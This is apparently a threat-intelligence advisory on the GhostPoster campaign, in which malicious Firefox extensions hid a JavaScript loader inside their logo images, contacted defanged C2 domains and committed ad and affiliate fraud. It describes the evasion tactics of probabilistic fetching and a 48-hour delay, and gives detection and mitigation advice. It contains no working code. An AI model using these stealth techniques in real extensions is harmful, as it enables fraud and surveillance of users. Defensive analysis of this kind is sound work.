Executive Summary

A newly discovered malware campaign, dubbed GhostPoster, has been found to have infected over 50,000 Mozilla Firefox users through a collection of 17 malicious browser extensions. First detailed by Koi Security, the campaign utilized add-ons that posed as popular tools such as VPNs, screenshot utilities, and unofficial versions of Google Translate. The primary goal of the malware was financial gain through affiliate link hijacking and ad/click fraud. The campaign's operators used a sophisticated method of hiding the initial loader script within an image file and implemented several evasion techniques to remain undetected for a prolonged period. The oldest identified malicious add-on was published in October 2024.

Threat Overview

The GhostPoster campaign relied on users installing malicious extensions from the official Firefox add-on store. Once installed, the malware executed a multi-stage infection chain designed for stealth and persistence.

1. Initial Infection: A user installs one of the 17 malicious add-ons (e.g., "Dark Mode," "Free VPN," "Screenshot").
2. Payload Hiding: The add-on fetches its own logo file (an image). Hidden within this image, separated by a === marker, is an obfuscated JavaScript loader. This is a form of steganography.
3. C2 Communication: The loader script attempts to contact one of two command-and-control (C2) domains: www.liveupdt[.]com or www.dealctr[.]com.
4. Evasion: To avoid detection by security researchers and sandboxes, the loader is programmed with two key evasion tactics:
   • It only attempts to fetch the final payload 10% of the time.
   • It waits 48 hours between each attempt to contact the C2 server.
5. Final Payload: Upon successful C2 contact, the main malicious payload is downloaded and executed. This payload monitors all browsing activity, injects tracking codes, hijacks affiliate links, and performs click fraud. Researchers also noted it opens a backdoor for potential remote code execution.

Technical Analysis

The use of an image file to hide the initial JavaScript loader is the most notable technique (T1140 - Deobfuscate/Decode Files or Information). This allows the malware to pass initial static analysis of the extension's code, as the malicious logic is not present in a standard .js file. The loader's probabilistic execution (10% chance) and long delay (48 hours) are classic anti-analysis techniques designed to defeat automated sandboxing environments that typically only run for a few minutes.

The ultimate goal appears to be a combination of ad fraud and affiliate hijacking. By monitoring browsing and injecting its own codes, the malware ensures the attackers receive commissions for online purchases or ad clicks made by the victim. The reported backdoor capability suggests the potential for more severe actions, such as deploying infostealers or ransomware.

Impact Assessment

While the primary impact is financial fraud, the implications for the 50,000+ victims are significant. The malware effectively compromises browser security, leading to:

• Loss of Privacy: The malware monitors all browsing activity, collecting data on user habits and visited websites.
• Security Downgrade: Researchers stated the malware "strips away your browser's security protections," making the victim more vulnerable to other web-based attacks.
• Potential for Further Infection: The backdoor functionality creates a persistent entry point on the victim's machine, which could be used to deliver more dangerous malware payloads in the future.

IOCs

Detection & Response

• Check Extensions: Firefox users should immediately review their installed browser extensions. A list of the 17 malicious add-ons should be available from security vendor reports. Remove any suspicious or unrecognized extensions.
• Network Monitoring: Monitor network traffic for any connections to the C2 domains www.liveupdt[.]com and www.dealctr[.]com. Block these domains at the firewall or DNS level.
• D3FEND Technique - D3-DA: Dynamic Analysis: For security teams, analyzing browser extensions in a long-running sandbox environment (more than 48 hours) may be necessary to trigger the delayed C2 callback and observe the malicious behavior.

Mitigation

• Limit Extensions (M1033 - Limit Software Installation): In an enterprise environment, use browser management policies to create an allowlist of approved extensions, preventing users from installing unvetted software.
• User Education: Train users to be cautious about installing browser extensions. They should stick to well-known, reputable developers and be wary of extensions with few reviews or recent publication dates.
• Endpoint Security: Deploy endpoint security solutions with web protection features that can inspect browser traffic and block connections to known malicious domains.